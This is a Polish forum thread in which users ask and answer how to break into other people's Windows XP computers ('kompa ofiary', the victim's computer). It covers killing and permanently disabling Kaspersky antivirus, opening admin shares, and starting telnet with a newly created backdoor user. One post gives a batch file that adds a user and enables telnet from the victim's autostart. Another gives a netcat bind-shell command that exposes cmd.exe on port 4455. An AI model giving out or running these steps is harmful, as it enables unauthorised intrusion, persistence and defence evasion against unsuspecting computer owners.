kilka pytan: zabijanie procesow, telnet itp.

Lechusky

Użytkownik
Dołączył
Styczeń 5, 2005
Posty
169
Kilka pytan :

1. Znacie jakis dobry program do zabijania procesow ?? Dokladnie chodzi mi o zabicie procesu kasperskiego antyvira, caly czas mi pisze odmowa dostepu. Probowalem zwyklym poleceniem taskkill i jakims programem ktory sciagnolem z jakiejs stronki (ps.exe i kill.exe) niestety oba soposoby zawiodly (odmowa dostepu)

2. Jest jakis sposob zeby po zabiciu procesu antyvira wylaczyc go calkiem zeby nie wlaczyl sie po ponownym uruchomieniu komputera (to wszystko z wierasza polecen) ??

3.Wbijam na jakiegos kompa (winshit xp) wpisuje net share dyskc$=c: wszystko ok, potem w przegladarce wpisuje ip_tego_kompadyskc$ i kicha musze podac haslo :| (z tego co wiem to powinno wejsc bez problemu na jego partycje c: ) co jest nie tak ??

4.(Tu tylko napiszcie czy dobrze czy moze o czyms zapominam) Wbijam na czyjegos kompa wpisuje net start telnet potem u siebie w wierszu polecen wpisuje telnet, programik sie odpala wpisuje open ip_tego_kompa port. Bo u mnie laczy sie potem wyskakuje zeby nacisnac dowolny przycisk i jak wcisne to jest polaczenie z hostem przerwane :/ ??

Z gory dzieki za odp.
smile.gif
 

DJBOSS666

Użytkownik
Dołączył
Luty 21, 2003
Posty
302
4: net start telent
+
urzytkonik np: Piotr
Haslo: ppp

i juz mamy dostep do kompa ofiary
<


Pozdrawiam

DJBOSS666
 

Lechusky

Użytkownik
Dołączył
Styczeń 5, 2005
Posty
169
Originally posted by DJBOSS666
4: net start telent
+
urzytkonik np: Piotr
Haslo: ppp

i juz mamy dostep do kompa ofiary
<


Pozdrawiam

DJBOSS666

yyy no to gdzie ja mam to wpisac uzytkownik i haslo ?? to w takim razie jak ma wygladac dokladnie polecenie ?? sorki ale cos nie kapuje (chyba ze to byla odp na pytanie 3 a nie 4
smile.gif
)
<


Originally posted by Chochlik
1. http://www.unitedcrew.net/ -> TError

Dzieki juz kiedys slyszalem o tym programie ale zapomnialem nazwy. Program jest swietny, ze wszystkim sobie ladnie radzi, ale z kasperskim niestety nie :/. Jakies sugestie ??
smile.gif


No i jeszcze zostalo pytanie 3 ktos wie ??
 

DJBOSS666

Użytkownik
Dołączył
Luty 21, 2003
Posty
302
To byla odpowiedz do 4 pytania
smile.gif


Musisz stworzyc urzytkownika najlepiej z prawami administratora na kompie zdalnym np urzytkownika Piotr i nadac temu urzytkownikowi haslo np: ppp teraz na kompie zdalnym musisz wpisac net start telnet, usluga powinna zostac uruchomiona i powinien byc taki komunikat:

Kod:
C:Documents and SettingsPiotr2>net start telnet

Usługa Telnet jest właśnie uruchamiana.          

Pomyślnie uruchomiono usługę Telnet.             

                                                 

                                                 

C:Documents and SettingsPiotr2>
a nastepnie laczymy sie na kompa zdalnego komenda telnet 84.21.23.45
i wpisujemy haslo oraz urzytkownika czyli Piotr i ppp
<


PS: moga zajsc problemy z odpaleniem "net start telnet" jezeli pojawi sie inny komunikat to powiedz
smile.gif

Pozdrawiam

DJBOSS666
 

Lechusky

Użytkownik
Dołączył
Styczeń 5, 2005
Posty
169
Dzieki. Ale szczerze to nie mam pojecia jak utworzyc uzytkownika na zdalnym komputerze majac dostep tylko do wiersza polecen :/. A tak pozatym to przeciez dana osoba przy pierwszym uruchomieniu ponownym zauwazy ze zostal utworzony nowy uzytkownik. No i ten przykladowy uzytkownik Piotr musi byc zalogowany jak bede probowal nawiazac polaczenie z tym kompem ?? Kurde a myslalem ze rozumie telneta :/:/ (Chyba, ze chodzi tylko o utworzenie folderu w documents and settings ??)
 

uzol

Użytkownik
Dołączył
Marzec 24, 2005
Posty
44
robisz plik *.bat , ladujesz tam
@echo off
net start telnet
net user NazwaUsera Hasło /add
net localgroup TelnetClients /add
net localgroup TelnetClients NazwaUsera /add
i wrzucasz do autostartu na kompie ofiary. jezeli nie ma wylaczonej uslugi telnet to wszytko winno dzialac. jest to bardzo proste, bzdurne i widoczne wkonanie (ale polowa i tak tego nie zauwazy). mozna zorbic to lepiej
 

Lechusky

Użytkownik
Dołączył
Styczeń 5, 2005
Posty
169
Originally posted by uzol
net user NazwaUsera Hasło /add

Tylko, ze musze miec NazwaUsera Haslo. Czyli jak napisal DJBOSS666 musze utworzyc nowego uzytkownika. Tylko nie wiem zabardzo jak to zrobic z wiersza polecen. Plus to ze ta osoba zauwazy chyba to ze jest nowy uzytkownik.

ps: Napewno zeby sie polaczyc przez telnet trzeba tworzyc nowego uzytkownika ??:>

ps2: Jak ktos wie to sa jeszcze inne pytania, bardzo mi zalezy na odp na nie bo to nie sa jakies pierdoly. Tak to bym nie pisal na forum.
 

DJBOSS666

Użytkownik
Dołączył
Luty 21, 2003
Posty
302
Mozesz zrobic inaczej ;P np tak
<
sciagamy nc.exe netCat na kompa ofiary i wpisujemy nastepujacy ciag tam gdzie mamy wsadzonego nc.exe piszemy:

nc.exe -p 4455 -d -L -e cmd.exe (opcja L umozliwia mocniejsze nasluchiwanie program nc.exe nasluchuje nawet jak sie raz polaczymy i sie rozlaczymy to nadal nasluchuje a opcja l nie nasluchuje caly czas bo jak sie raz polaczymy i sie rozlaczymy to jak bedziemy chcieli jeszcze raz sie polaczyc to dupa ) teraz wystarczy wpisac telnet <ip> <port> gdzie port tutaj to 4455
<
no i tyle
<



PS: poczytaj o tak zwanym urzytkownku pomocniku
<
a i jeszcze jak nie wiesz jak zrobic w cmd.exe urzytkownika to uzol podal wlasnie Tobie jak to zrobic tylko On byl tak mily ze odrazu Tobie podal to w formie pliczku *.bat

Pozdrawiam

DJBOSS666
 
Do góry Bottom